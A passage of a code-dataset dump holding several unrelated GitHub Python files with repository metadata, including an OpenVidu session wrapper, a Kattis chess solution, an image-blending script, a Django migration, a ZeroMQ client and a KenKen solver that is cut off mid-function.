Get a currently active connection to the server.\n\n :param connection_id: Connection id.\n :return: A OpenViduConnection objects.\n \"\"\"\n with self._lock:\n if not self._data:\n raise OpenViduSessionDoesNotExistsError()\n\n for connection_info in self._data['connections']['content']:\n if connection_info['connectionId'] == connection_id:\n return OpenViduConnection(self._session, self.id, connection_info)\n\n raise OpenViduConnectionDoesNotExistsError()\n\n def signal(self, type_: str = None, data: str = None, to: List[OpenViduConnection] = None):\n \"\"\"\n Sends a signal to all participants in the session or specific connections if the `to` property defined.\n OpenViduConnection objects also implement this method.\n\n https://docs.openvidu.io/en/2.12.0/reference-docs/REST-API/#post-apisignal\n\n :param type_: Type of the signal. In the body example of the table above, only users subscribed to Session.on('signal:MY_TYPE') will trigger that signal. Users subscribed to Session.on('signal') will trigger signals of any type.\n :param data: Actual data of the signal.\n :param to: List of OpenViduConnection objects to which you want to send the signal. If this property is not set (None) the signal will be sent to all participants of the session.\n \"\"\"\n with self._lock:\n if not self._data: # Fail early... and always\n raise OpenViduSessionDoesNotExistsError()\n\n if to:\n recipient_list = [connection.id for connection in to]\n else:\n recipient_list = None\n\n parameters = {\n \"session\": self.id,\n \"to\": recipient_list,\n \"type\": type_,\n \"data\": data\n }\n\n parameters = {k: v for k, v in parameters.items() if v is not None}\n\n # send request\n r = self._session.post('api/signal', json=parameters)\n\n if r.status_code == 404:\n raise OpenViduSessionDoesNotExistsError()\n elif r.status_code == 400:\n raise ValueError()\n elif r.status_code == 406:\n raise OpenViduConnectionDoesNotExistsError()\n\n r.raise_for_status()\n\n def publish(self, rtsp_uri: str, data: str = '', adaptive_bitrate: bool = True,\n only_play_with_subscribers: bool = True, type_: str = \"IPCAM\") -> OpenViduConnection:\n \"\"\"\n Publishes a new IPCAM rtsp stream to the session.\n\n Unlike `OpenVidu.create_session` this method does not call fetch() automatically, since the server returns enough data to construct the connection object.\n Keep in mind, that if you want the newly created Connection to appear in the `connections` list, you should call fetch() before accessing the list!\n\n https://docs.openvidu.io/en/2.12.0/reference-docs/REST-API/#post-apisessionsltsession_idgtconnection\n\n :param rtsp_uri: RTSP URI of the IP camera. For example: `rtsp://your.camera.ip:7777/path`.\n :param data: Metadata you want to associate to the camera's participant.\n :param adaptive_bitrate: Whether to use adaptive bitrate or not.\n :param only_play_with_subscribers: Enable the IP camera stream only when some user is subscribed to it.\n :param type_: Which type of stream will be published. Defaults to `IPCAM`.\n :return: An OpenVidu connection object represents the newly created connection.\n \"\"\"\n with self._lock:\n if not self._data: # Fail early... and always\n raise OpenViduSessionDoesNotExistsError()\n\n parameters = {\n \"type\": type_,\n \"rtspUri\": rtsp_uri,\n \"adaptativeBitrate\": adaptive_bitrate,\n \"onlyPlayWithSubscribers\": only_play_with_subscribers,\n \"data\": data\n }\n\n r = self._session.post(f'api/sessions/{self.id}/connection', json=parameters)\n\n if r.status_code == 404:\n raise OpenViduSessionDoesNotExistsError()\n elif r.status_code == 400:\n raise ValueError()\n elif r.status_code == 500:\n raise OpenViduError(r.content)\n\n return OpenViduConnection(self._session, self.id, r.json())\n\n @property\n def connection_count(self) -> int:\n \"\"\"\n Get the number of active connections to the session.\n\n :return: The number of active connections.\n \"\"\"\n with self._lock:\n if not self._data:\n raise OpenViduSessionDoesNotExistsError()\n\n return self._data['connections']['numberOfElements']\n\n @property\n def id(self) -> str:\n \"\"\"\n :return: The ID of this session.\n \"\"\"\n with self._lock:\n if not self._data:\n raise OpenViduSessionDoesNotExistsError()\n\n return self._data['sessionId']\n\n @property\n def created_at(self) -> datetime:\n \"\"\"\n :return: datetime object when the session was created in UTC time.\n \"\"\"\n with self._lock:\n return datetime.utcfromtimestamp(self._data['createdAt'] / 1000.0)\n\n @property\n def is_being_recorded(self) -> bool:\n \"\"\"\n :return: True if the session is being recorded. False otherwise.\n \"\"\"\n with self._lock:\n return self._data['recording']\n\n @property\n def media_mode(self) -> str:\n \"\"\"\n :return: Media mode configured for the session ('ROUTED' or 'RELAYED').\n \"\"\"\n with self._lock:\n return self._data['mediaMode']\n","repo_name":"swipswaps/pyopenvidu","sub_path":"pyopenvidu/openvidusession.py","file_name":"openvidusession.py","file_ext":"py","file_size_in_byte":11752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"17817745664","text":"\"\"\"\"\"\nhttps://open.kattis.com/problems/chess\n\n\nThe basic premise of this code is to calculate how a bishop \nwould move from any given position on the chessboard to any \nother position. Check out the full description of the coding \nchallenge here:https://open.kattis.com/problems/chess \n\nDifficulty rating 2.9🟡 medium\n\n\"\"\"\n\n#TODO: Re map the coordinate plane to clean up code and readability\n#This is done and working, but I may come back and clean it up more!\n\n#mapping created on chess board \n #A 1 is [0 , [0 , 0 ]] Black\n #A 8 is [1 , [0 , 0 ]] White\n # [Color, [up/down, distanct right]]\nmapping = {\n \"A 1\" : [0,[0,0]],\n \"B 2\" : [0,[0,1]],\n \"C 3\" : [0,[0,2]],\n \"D 4\" : [0,[0,3]],\n \"E 5\" : [0,[0,4]],\n \"F 6\" : [0,[0,5]],\n \"G 7\" : [0,[0,6]],\n \"H 8\" : [0,[0,7]],\n \n \"C 1\" : [0,[-1,1]],\n \"D 2\" : [0,[-1,2]],\n \"E 3\" : [0,[-1,3]],\n \"F 4\" : [0,[-1,4]],\n \"G 5\" : [0,[-1,5]],\n \"H 6\" : [0,[-1,6]],\n\n \"E 1\" : [0,[-2,2]],\n \"F 2\" : [0,[-2,3]],\n \"G 3\" : [0,[-2,4]],\n \"H 4\" : [0,[-2,5]],\n\n \"G 1\" : [0,[-3,3]],\n \"H 2\" : [0,[-3,4]],\n\n \"A 3\" : [0,[1,1]],\n \"B 4\" : [0,[1,2]],\n \"C 5\" : [0,[1,3]],\n \"D 6\" : [0,[1,4]],\n \"E 7\" : [0,[1,5]],\n \"F 8\" : [0,[1,6]],\n\n \"A 5\" : [0,[2,2]],\n \"B 6\" : [0,[2,3]],\n \"C 7\" : [0,[2,4]],\n \"D 8\" : [0,[2,5]],\n\n \"A 7\" : [0,[3,3]],\n \"B 8\" : [0,[3,4]],\n\n #white squares\n \"A 8\" : [1, [0,0]],\n \"B 7\" : [1, [0,1]],\n \"C 6\" : [1, [0,2]],\n \"D 5\" : [1, [0,3]],\n \"E 4\" : [1, [0,4]],\n \"F 3\" : [1, [0,5]],\n \"G 2\" : [1, [0,6]],\n \"H 1\" : [1, [0,7]],\n \n \"A 6\" : [1, [-1,1]],\n \"B 5\" : [1, [-1,2]],\n \"C 4\" : [1, [-1,3]],\n \"D 3\" : [1, [-1,4]],\n \"E 2\" : [1, [-1,5]],\n \"F 1\" : [1, [-1,6]],\n\n \"A 4\" : [1, [-2,2]],\n \"B 3\" : [1, [-2,3]],\n \"C 2\" : [1, [-2,4]],\n \"D 1\" : [1, [-2,5]],\n\n \"A 2\" : [1, [-3,3]],\n \"B 1\" : [1, [-3,4]],\n\n \"C 8\" : [1, [1,1]],\n \"D 7\" : [1, [1,2]],\n \"E 6\" : [1, [1,3]],\n \"F 5\" : [1, [1,4]],\n \"G 4\" : [1, [1,5]],\n \"H 3\" : [1, [1,6]],\n\n \"E 8\" : [1, [2,2]],\n \"F 7\" : [1, [2,3]],\n \"G 6\" : [1, [2,4]],\n \"H 5\" : [1, [2,5]],\n\n \"G 8\" : [1, [3,3]],\n \"H 7\" : [1, [3,4]],\n}\n\n\ndef moveBishop(numberOfInput,coordinateInputList):\n\n for i in range(numberOfInput):\n numMoves = 0\n\n CoordinateHolder = coordinateInputList[i]\n\n #Convert A 1 to [0, [0,0]] etc\n startCoordinate = mapping[CoordinateHolder[0:3]]\n endCoordinate = mapping[CoordinateHolder[4:7]]\n\n #put the starting coordinate into the outputString\n outputString = CoordinateHolder[0:3]\n\n #if going to same location\n if startCoordinate[1] == endCoordinate[1]:\n numMoves = 0\n #if if row or col is the same\n elif startCoordinate[1][0] == endCoordinate[1][0] or startCoordinate[1][1] == endCoordinate[1][1]:\n outputString += \" \" + CoordinateHolder[4:7]\n numMoves = 1\n\n else:\n numMoves = 2\n # # find the linking move\n # print(\"START\",startCoordinate, \"END:\", endCoordinate)\n if [startCoordinate[0],[startCoordinate[1][0],endCoordinate[1][1]]] in list(mapping.values()):\n # for the key and value pairings in the dict\n for key,val in mapping.items() :\n # if current value == possible coordinate \n if val == [startCoordinate[0],[startCoordinate[1][0],endCoordinate[1][1]]]: \n outputString += \" \" + key\n # print(startCoordinate[0],[startCoordinate[1][0],endCoordinate[1][1]])\n\n else:\n for key,val in mapping.items() :\n if val == [startCoordinate[0],[endCoordinate[1][0],startCoordinate[1][1]]]:\n outputString += \" \" + key\n\n #add final destination to outputString\n outputString += \" \" + CoordinateHolder[4:7]\n \n # if color is different\n if mapping[CoordinateHolder[0:3]][0] != mapping[CoordinateHolder[4:7]][0]:\n print(\"Impossible\")\n else:\n print(str(numMoves),outputString)\n\n\nif __name__ == \"__main__\":\n #How many tests should be done?\n numberOfInput = int(input()) \n\n #initialize \n inputCoordinates = []\n\n for i in range(numberOfInput):\n #Take in all the inputs into a list\n inputCoordinates.append(input())\n moveBishop(numberOfInput,inputCoordinates)\n\n#note to self, clean code up before submitting it, review every comment.","repo_name":"JDNafz/JDNafz","sub_path":"Open Kattis/Chess.py","file_name":"Chess.py","file_ext":"py","file_size_in_byte":4593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32350010583","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nfrom PIL import Image\n\n\ndef plotting_image(image):\n px = 1/plt.rcParams['figure.dpi'] \n \n fig = plt.figure() \n ax = fig.add_subplot(111)\n ax.set_axis_off()\n imgplot = plt.imshow(image, interpolation='none') \t\n plt.savefig('./The_model.png', transparent=False, dpi=200, bbox_inches='tight', pad_inches=0)\n #plt.show()\n\nfilename1 = 'mes.jpeg'\n#filename1 = 'my.png'\nfilename2 = \"message.bmp\"\nimg1 = mpimg.imread(filename1)\nimg2 = mpimg.imread(filename2)\n\nimgg = np.zeros_like(img1)\n\nfor i in range(3):\n imgg[:,:,i] = (img1[:,:,i] + img2[:,:,i])\n'''\n\nimg2 = img2/50\n\nimgg[:,:,0] = (img1[:,:,1] * img2[:,:,2])\nimgg[:,:,1] = (img1[:,:,2] * img2[:,:,0])\nimgg[:,:,2] = (img1[:,:,0] * img2[:,:,1])\n\n'''\nimg = Image.fromarray(imgg)\nimg.save('hidden.png')\n\nimgplot = plt.imshow(imgg)\nplt.show()\n'''\nplotting_image(imgg)\n'''","repo_name":"IlyaMbot/HideAndSeek","sub_path":"hide.py","file_name":"hide.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"2971837246","text":"\nclass Segment:\n\n def __init__(self, s, e):\n\n self.start = s\n self.end = e\n\ndef get_optimal_points(segments):\n\n segments.sort(key=lambda segment: segment.end)\n\n current = segments[0].end\n\n points = [current]\n\n for i in range(1, len(segments)):\n\n if current < segments[i].start or current > segments[i].end:\n\n current = segments[i].end\n\n points.append(current)\n\n return points\n\ndef main():\n\n segments = [\n Segment(4, 7),\n Segment(1, 3),\n Segment(2, 5),\n Segment(5, 6)\n ]\n\n for point in get_optimal_points(segments):\n\n print(point)\n\nif __name__ == '__main__':\n main()\n","repo_name":"sshh12/SchoolCode","sub_path":"Algorithms/Greedy/CoveringSegments.py","file_name":"CoveringSegments.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"12604614273","text":"from django.apps import apps\nfrom django.db import migrations, models\nfrom django.db.models import F\n\n\ndef copy_field(apps, schema_editor):\n CertificateGenerationCourseSetting = apps.get_model('certificates', 'CertificateGenerationCourseSetting')\n CertificateGenerationCourseSetting.objects.all().update(self_generation_enabled=F('enabled'))\n\ndef undo_copy(apps, schema_editor):\n CertificateGenerationCourseSetting = apps.get_model('certificates', 'CertificateGenerationCourseSetting')\n CertificateGenerationCourseSetting.objects.all().update(enabled=F('self_generation_enabled'))\n\nclass Migration(migrations.Migration):\n \"\"\"\n Adds new field 'language_specific_templates_enabled'.\n Also adds field 'self_generation_enabled' which is a \n replacement for 'enabled'\n Lastly, copies data from 'enabled' to 'self_generation_enabled'\n \"\"\"\n dependencies = [\n ('certificates', '0008_schema__remove_badges'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='certificategenerationcoursesetting',\n name='language_specific_templates_enabled',\n field=models.BooleanField(default=False, help_text=\"Render translated certificates rather than using the platform's default language. Available translations are controlled by the certificate template.\"),\n ),\n migrations.AddField(\n model_name='certificategenerationcoursesetting',\n name='self_generation_enabled',\n field=models.BooleanField(default=False, help_text='Allow students to generate their own certificates for the course. Enabling this does NOT affect usage of the management command used for batch certificate generation.'),\n ),\n migrations.AlterField(\n model_name='certificategenerationcoursesetting',\n name='enabled',\n field=models.BooleanField(default=False, help_text='DEPRECATED, please use self_generation_enabled instead.'),\n ),\n migrations.RunPython(copy_field, reverse_code=undo_copy),\n ]\n","repo_name":"openedx/edx-platform","sub_path":"lms/djangoapps/certificates/migrations/0009_certificategenerationcoursesetting_language_self_generation.py","file_name":"0009_certificategenerationcoursesetting_language_self_generation.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","stars":6774,"dataset":"github-code","pt":"3"} +{"seq_id":"23822151149","text":"# -*- coding: utf-8 -*-\n# @file : pull.py\n# @author : shlian\n# @date : 2019/6/6\n# @version: 1.0\n# @desc :\nimport zmq\nimport zmq.asyncio\nimport asyncio\nimport signal\n\nrun_flag=True\n\nasync def start():\n context=zmq.asyncio.Context(io_threads=5)\n pull_socket=context.socket(socket_type=zmq.PULL)\n pull_socket.connect(\"tcp://127.0.0.1:46789\")\n\n poller=zmq.asyncio.Poller()\n poller.register(socket=pull_socket)\n\n while(run_flag):\n for event in await poller.poll():\n if event[1] & zmq.POLLIN:\n data=await event[0].recv_json()\n print(\"recv:{0}\".format(data))\n\n #data=await pull_socket.recv_json()\n #print(\"recv:{0}\".format(data))\n\n\ndef sig_handler(signum,frame):\n global run_flag\n run_flag=False\n print(signum,frame)\n\nif __name__==\"__main__\":\n signal.signal(signal.SIGINT,sig_handler)\n signal.signal(signal.SIGTERM,sig_handler)\n asyncio.get_event_loop().run_until_complete(future=start())\n\n\n\n\n\n\n","repo_name":"ztenv/python","sub_path":"zeromq/push-pull/pull.py","file_name":"pull.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"14324288390","text":"res = \"\"\nmax = -99999\nmin = 99999\nfor i in range(1, 8):\n t = float(input())\n if t < 10:\n res = res + str(i) + \" \"\n if t < min:\n min = t\n if t > max:\n max = t\nprint(res)\nprint(min)\nprint(max)\n\n","repo_name":"duongnn194034/python-basic-2","sub_path":"Mid-Term/Test07.py","file_name":"Test07.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27687196791","text":"from django.urls import include, path\nfrom rest_framework.routers import DefaultRouter\n\nfrom .views import (CartItemViewSet, CartViewSet, CatalogViewSet,\n OrderItemViewSet, OrderViewSet, ProductViewSet,\n ReviewViewSet, CommentViewSet, ShippingAddressViewSet,\n sending_confirm_order)\n\nrouter = DefaultRouter()\nrouter.register('catalog', CatalogViewSet, basename='catalog')\nrouter.register('products', ProductViewSet, basename='products')\nrouter.register('cart', CartViewSet, basename='cart')\nrouter.register('cart-products', CartItemViewSet, basename='cart-products')\n\nrouter.register('order', OrderViewSet, basename='order')\nrouter.register('order-items', OrderItemViewSet, basename='order-items')\nrouter.register('shipping-address', ShippingAddressViewSet,\n basename='shipping-address')\n\nrouter.register('reviews', ReviewViewSet, basename='reviews')\nrouter.register('comments', CommentViewSet, basename='comments')\n\nurlpatterns = [\n path('v1/', include(router.urls)),\n path('v1/auth/', include('djoser.urls')),\n path('v1/auth/', include('djoser.urls.jwt')),\n path(\"v1/sending-confirm-order/\", sending_confirm_order,\n name=\"sending_confirm_order\"),\n]\n","repo_name":"EvgeniyBudaev/eccomerce_fullstack_mirrorlook_v3","sub_path":"backend/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"30239950300","text":"from aiogram import Bot, F, types\nfrom aiogram.fsm.context import FSMContext\nfrom aiogram.fsm.state import State\nfrom aiogram.types import ReplyKeyboardRemove\n\nfrom ...utils.common_keyboards import confirmation_keyboard\nfrom .. import messages\nfrom ..bot import dp\nfrom ..models import Blocked\n\nconfirmation_state = State(\"confirm_block\")\n\n\n@dp.callback_query(lambda callback_query: str(callback_query.data).startswith(\"block_\"))\nasync def block_request(\n callback_query: types.CallbackQuery,\n state: FSMContext,\n bot: Bot,\n m: messages.en.Messages,\n):\n user_tg_id = callback_query.message.chat.id\n dst_tg_id = callback_query.data.split(\"_\")[1]\n await callback_query.answer()\n await state.set_state(confirmation_state)\n await state.set_data({\"blocking\": dst_tg_id})\n await bot.send_message(\n user_tg_id,\n m.block_confirmation,\n reply_markup=confirmation_keyboard(yes=m.yes_block, no=m.no_cancel),\n )\n\n\n@dp.message(confirmation_state, F.text.in_(messages.union.yes_block))\nasync def block_confirmed(\n message: types.Message, state: FSMContext, m: messages.en.Messages\n):\n user_tg_id = message.chat.id\n dst_tg_id = (await state.get_data())[\"blocking\"]\n _, __ = await Blocked.objects.aget_or_create(blocker=user_tg_id, blocked=dst_tg_id)\n await state.clear()\n await message.reply(m.user_blocked, reply_markup=ReplyKeyboardRemove())\n\n\n@dp.message(confirmation_state, F.text.in_(messages.union.no_cancel))\nasync def block_cancelled(\n message: types.Message, state: FSMContext, m: messages.en.Messages\n):\n await state.clear()\n await message.reply(m.block_cancelled, reply_markup=ReplyKeyboardRemove())\n\n\n@dp.message(confirmation_state)\nasync def unknown(message: types.Message, m: messages.en.Messages):\n await message.reply(m.confirmation_keyboard_ignored)\n","repo_name":"Ali-Toosi/eastern-bots","sub_path":"eastern_bots/opanonbot/handlers/block.py","file_name":"block.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8217840281","text":"#!/usr/bin/python3\n\n#a function that prints numbers 1 to 100\n\nfor i in range(1,101):\n\n if (i % 3 != 0):\n\n print(f'{i}, ',end='')\n\n else:\n\n print(f'Ngure, ',end='')\n\n","repo_name":"nguredavid/learnpython","sub_path":"0x01-python-if_else_loops_functions/12-fizzbuzz.py","file_name":"12-fizzbuzz.py","file_ext":"py","file_size_in_byte":185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5261683681","text":"\"\"\"\nMisago UI views controller\n\nUI views are small views that are called asynchronically to give UI knowledge\nof changes in APP state and thus opportunity to update themselves in real time\n\"\"\"\nfrom time import time\n\nfrom django.core.exceptions import PermissionDenied\nfrom django.core.urlresolvers import resolve\nfrom django.http import Http404, JsonResponse\n\nfrom misago.users.online.tracker import mute_tracker\n\nfrom misago.core.decorators import ajax_only\nfrom misago.core.utils import is_referer_local\n\n\n__all__ = ['uiview', 'uiserver']\n\n\nUI_VIEWS = []\n\n\ndef uiview(name, cache_frequency=15):\n \"\"\"\n Decorator for registering UI views\n \"\"\"\n def namespace_decorator(f):\n UI_VIEWS.append((name, cache_frequency, f))\n return f\n return namespace_decorator\n\n\ndef get_resolver_match(request):\n requesting_path = request.META['HTTP_REFERER']\n requesting_path = requesting_path[len(request.scheme) + 3:]\n requesting_path = requesting_path[len(request.META['HTTP_HOST']):]\n\n try:\n return resolve(requesting_path)\n except Http404:\n return None\n\n\n@ajax_only\ndef uiserver(request):\n mute_tracker(request)\n\n if not is_referer_local(request):\n raise PermissionDenied()\n\n resolver_match = get_resolver_match(request)\n response_dict = {}\n\n now = int(time())\n\n for name, cache_frequency, view in UI_VIEWS:\n cache_key = 'uijson_%s' % name\n cache = request.session.get(cache_key)\n\n if not cache or cache['expires'] < now:\n try:\n view_response = view(request, resolver_match)\n except PermissionDenied:\n view_response = None\n\n request.session[cache_key] = {\n 'json': view_response,\n 'expires': now + cache_frequency\n }\n\n if view_response:\n response_dict[name] = view_response\n elif cache['json']:\n response_dict[name] = cache['json']\n\n return JsonResponse(response_dict)\n","repo_name":"xuzhao1211/OnlineExam","sub_path":"misago/core/uiviews.py","file_name":"uiviews.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26413000439","text":"#!/usr/bin/env python3\n\nimport sys\n\ni = 0\nb = 0\n#t = 0\n#Input#\nif len(sys.argv) > 1:\n #open from file#\n f = open( sys.argv[1] )\nelse:\n #read from the stain by using <#\n f = sys.stdin\n \nfor count, line in enumerate( f ):\n #Alignments#\n if line.startswith(\"SRR072893\"):\n fields = line.rstrip(\"\\r\\n\").split(\"\\t\")\n b = 0\n for l in fields[5]:\n if l in (\"I\", \"D\", \"N\", \"S\", \"H\", \"P\", \"=\", \"X\"):\n b = 1\n for l in fields[5]:\n if l in (\"M\") and b == 0:\n i = i+1\n\nprint(\"There are \" + str(i) + \" alignments that match perfectly to the genome.\")","repo_name":"djlmt/qbb2018-answers","sub_path":"day2-lunch/day2-exercise-2.py","file_name":"day2-exercise-2.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25151226350","text":"import sys\nfrom collections import deque\nimport copy\nimport itertools\n\n'''\nInput:\n n - where grid is nxn\n m - number of constraints\n 1 constraint per line\n ex. + 2 0,1 0,2\n * 9 2,2 3,2 2,3\n v 4 5,2\n'''\n\ndef read_input():\n constraints = []\n size = int(sys.stdin.readline().strip())\n num_constraints = int(sys.stdin.readline().strip())\n for i in range(num_constraints):\n constraint = sys.stdin.readline().strip()\n constraint = constraint.split(' ')\n constraint[1] = int(constraint[1])\n for j in range(2, len(constraint)):\n constraint[j] = (int(constraint[j][0]), int(constraint[j][2]))\n constraints.append(constraint)\n return size, num_constraints, constraints\n\nclass KenKenSolver:\n def __init__(self, size):\n self.size = size\n self.assignment = [[0 for i in range(size)] for i in range(size)]\n self.domains = {}\n self.arcs = {}\n self.constraints = {}\n\n def display(self):\n for i in range(self.size):\n print(self.assignment[i])\n \n '''\n Adds possible values from 1 to n to domain for each position in puzzle\n '''\n def createDomains(self):\n for i in range(self.size):\n for j in range(self.size):\n self.domains[(i,j)] = []\n for k in range(self.size):\n self.domains[(i,j)].append(k + 1)\n \n \"\"\"\n Creates arc between positions on same column or row\n \"\"\"\n def createArcs(self):\n for i in range(self.size):\n for j in range(self.size):\n self.arcs[(i,j)] = []\n for arc in self.arcs:\n for i in range(self.size):\n if i != arc[1]:\n self.arcs[arc].append((arc[0], i))\n for i in range(self.size):\n if i != arc[0]:\n self.arcs[arc].append((i, arc[1]))\n \n \"\"\"\n Adds constraint for each position based on arithmetic box it is a member of\n \"\"\"\n def addConstraints(self, constraints):\n for i in range(len(constraints)):\n if constraints[i][0] != 'v':\n for j in range(2, len(constraints[i])):\n self.constraints[constraints[i][j]] = []\n for k in range(len(constraints[i])):\n if constraints[i][k] != constraints[i][j]:\n self.constraints[constraints[i][j]].append(constraints[i][k])\n \n \"\"\"\n Assigns any values that are given in initial puzzle state\n \"\"\"\n def createAssignment(self, constraints):\n for i in range(len(constraints)):\n if constraints[i][0] == 'v':\n pos = constraints[i][2]\n self.assignment[pos[0]][pos[1]] = constraints[i][1]\n\n \"\"\"\n AC3 algorithm - removes illegal values from each square's domain\n \"\"\"\n def AC3(self):\n revised = False\n q = deque()\n for arc in self.arcs:\n for var in self.arcs[arc]:\n q.append((arc, var))\n while q:\n (Xi, Xj) = q.popleft()\n if self.revise(Xi, Xj):\n assert len(self.domains[Xi]) > 0\n for Xk in self.arcs[Xi]:\n if Xk != Xj:\n q.append((Xk, Xi)) \n revised = True\n return revised\n \n def revise(self, Xi, Xj):\n revised = False\n for x in self.domains[Xi]:\n needToRevise = True\n for y in self.domains[Xj]:\n if y != x:\n needToRevise = False\n if needToRevise:\n self.domains[Xi].remove(x)\n revised = True\n return revised\n\n \"\"\"\n Uses AC3 algorithm to remove illegal values from each square's domain based\n on arithmetic box\n \"\"\"\n def AC3Constraints(self):\n revised = False\n q = deque()\n for var in self.constraints:\n q.append((var, list(self.constraints[var][2:])))\n while q:\n (Xi, Xj) = q.popleft()\n if self.reviseConstraints(Xi, Xj):\n assert len(self.domains[Xi]) > 0\n for Xk in Xj:\n q.append((Xk, list(self.constraints[Xk][2:])))\n revised = True\n return revised\n\n def reviseConstraints(self, Xi, Xj):\n revised = False\n operation = self.constraints[Xi][0]\n target = self.constraints[Xi][1]\n if len(Xj) == 1:\n for x in self.domains[Xi]:\n needToRevise = True\n for Xk in Xj:\n for y in self.domains[Xk]:\n if operation == '+':\n if x + y == target:\n needToRevise = False\n if operation == '*':\n if x * y == target:\n needToRevise = False\n if operation == '-':\n if x - y == target or y - x == target:\n needToRevise = False\n if operation == '/':\n if x / y == target or y / x == target:\n needToRevise = False\n if needToRevise:\n self.domains[Xi].remove(x)\n revised = True\n else:\n domains = []\n for Xk in Xj:\n domains.append(self.domains[Xk])\n fullDomain = list(itertools.product(*domains))\n possibleValues = []\n for x in self.domains[Xi]:\n needToRevise = True\n if operation == '+':\n for i in range(len(fullDomain)):\n possibleValues.append(self.addValue(fullDomain[i]))\n for y in possibleValues:\n if x + y == target:\n needToRevise = False\n elif operation == '*':\n for i in range(len(fullDomain)):\n possibleValues.append(self.multiplyValue(fullDomain[i]))\n for y in possibleValues:\n if x * y == target:\n needToRevise = False\n if needToRevise:\n self.domains[Xi].remove(x)\n revised = True\n return revised\n\n \"\"\"\n Runs both AC3 algorithms until no further changes are made\n \"\"\"\n def AC3Prep(self):\n reg_revised = True\n constraint_revised = True\n while not self.isAssignmentComplete() and (reg_revised or constraint_revised) :\n for var in self.domains:\n if len(self.domains[var]) == 1:\n self.assignment[var[0]][var[1]] = self.domains[var][0]\n if len(self.domains[var]) == 0:\n return \"Unsolvable\"\n reg_revised = self.AC3()\n constraint_revised = self.AC3Constraints()\n\n\n def backtrackSearch(self):\n if self.backtrack() != \"failure\":\n self.display()\n else:\n print(\"Could not solve\")\n\n \"\"\"\n Backtrack search - attempts to complete assignment,\n backtracks if dead end reached\n \"\"\"\n def backtrack(self):\n if self.isAssignmentComplete():\n return self.assignment\n var = self.selectUnassignedVariable()\n for value in self.orderDomainValues(var):\n if self.isAssignmentConsistent(var, value):\n self.assignment[var[0]][var[1]] = value\n result = self.backtrack()\n if result != \"failure\":\n return result\n self.assignment[var[0]][var[1]] = 0\n return \"failure\"\n\n def isAssignmentComplete(self):\n for i in range(self.size):\n for j in range(self.size):\n if self.assignment[i][j] == 0:\n return False\n return True\n\n def isAssignmentConsistent(self, Xi, x):\n assignment = copy.deepcopy(self.assignment)\n assignment[Xi[0]][Xi[1]] = x\n isConsistent = True\n if not self.isNodeConsistent(assignment, Xi):\n isConsistent = False\n for Xj in self.arcs[Xi]:\n if not self.isArcConsistent(assignment, Xi, Xj):\n isConsistent = False\n if not self.isNodeConstraintConsistent(assignment, Xi):\n isConsistent = False\n return isConsistent \n\n \"\"\"\n Checks if square's assignment is consistent with arithmetic box\n - if neighbor(s) are already assigned, \n value must be consistent with target value\n - if neighbor(s) have not been assigned,\n value must allow for possible achievement of target value\n \"\"\"\n def isNodeConstraintConsistent(self, assignment, Xi):\n isConsistent = False\n operation = self.constraints[Xi][0]\n target = self.constraints[Xi][1]\n Xj = list(self.constraints[Xi][2:])\n if len(Xj) == 1:\n if assignment[Xj[0][0]][Xj[0][1]] == 0:\n for y in self.domains[Xj[0]]:\n if operation == '+':\n if assignment[Xi[0]][Xi[1]] + y == target:\n isConsistent = True\n elif operation == '*':\n if assignment[Xi[0]][Xi[1]] * y == target:\n isConsistent = True\n elif operation == '-':\n if (assignment[Xi[0]][Xi[1]] - y == target or\n y - assignment[Xi[0]][Xi[1]] == target):\n isConsistent = True\n elif operation == '/':\n if (assignment[Xi[0]][Xi[1]] / y == target or\n y / assignment[Xi[0]][Xi[1]] == target):\n isConsistent = True\n else:\n if operation == '+':\n if assignment[Xi[0]][Xi[1]] + assignment[Xj[0][0]][Xj[0][1]] == target:\n isConsistent = True\n elif operation == '*':\n if assignment[Xi[0]][Xi[1]] * assignment[Xj[0][0]][Xj[0][1]] == target:\n isConsistent = True\n elif operation == '-':\n if (assignment[Xi[0]][Xi[1]] - assignment[Xj[0][0]][Xj[0][1]] == target or\n assignment[Xj[0][0]][Xj[0][1]] - assignment[Xi[0]][Xi[1]] == target):\n isConsistent = True\n elif operation == '/':\n if (assignment[Xi[0]][Xi[1]] / assignment[Xj[0][0]][Xj[0][1]] == target or\n assignment[Xj[0][0]][Xj[0][1]] / assignment[Xi[0]][Xi[1]] == target):\n isConsistent = True \n else:\n domains = []\n for Xk in Xj:\n if assignment[Xk[0]][Xk[1]] == 0:\n domains.append(self.domains[Xk])\n else:\n domains.append([assignment[Xk[0]][Xk[1]]])\n fullDomain = list(itertools.product(*domains))\n possibleValues = []\n if operation == '+':\n for i in range(len(fullDomain)):\n possibleValues.append(self.addValue(fullDomain[i]))\n for y in possibleValues:\n if assignment[Xi[0]][Xi[1]] + y == target:\n isConsistent = True\n elif operation == '*':\n for i in range(len(fullDomain)):\n possibleValues.append(self.multiplyValue(fullDomain[i]))\n for y in possibleValues:\n if 